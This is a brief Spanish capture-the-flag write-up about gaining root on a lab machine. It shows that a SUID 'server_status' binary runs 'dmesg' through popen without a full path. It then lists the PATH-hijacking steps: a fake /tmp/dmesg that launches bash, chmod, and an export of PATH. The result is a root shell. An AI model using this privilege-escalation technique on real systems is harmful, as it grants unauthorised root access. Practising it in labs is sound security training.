Title here
Summary here
July 11, 20251 minute
Para este reto se proporcionaban credenciales de ssh.
hacker@88110e7a3727:~$ ./server_status
=== Server Status Monitor v1.0 ===
System diagnostic tool with root privileges
Running with elevated privileges (UID: 0, GID: 0)
Initializing...
Hacking Nasa...
****************************************
Done!
=== Command Output ===
dmesg: read kernel buffer failed: Operation not permitted
=== End of Output ===
System status check completed successfully!
Al entrar al ssh salta a la vista server_status un progrma con permisos SUID
En la función principal se llama a otra función pasandole dmesg
iVar1 = FUN_001015b0("dmesg");
Después en esta otra función lo ejecuta
__stream = popen(command,"r");
El comando se ejecuta sin la ruta completa así que se puede hacer un path hijacking
1- Dentro de /tmp se crea un archivo de nombre dmesg
con
#!/bin/bash
/bin/bash
2- Se le da permisos de ejecución
chmod +x dmesg
3- Se modifica el PATH
export PATH=/tmp:$PATH
Al ejecutarlo aparece una shell como root.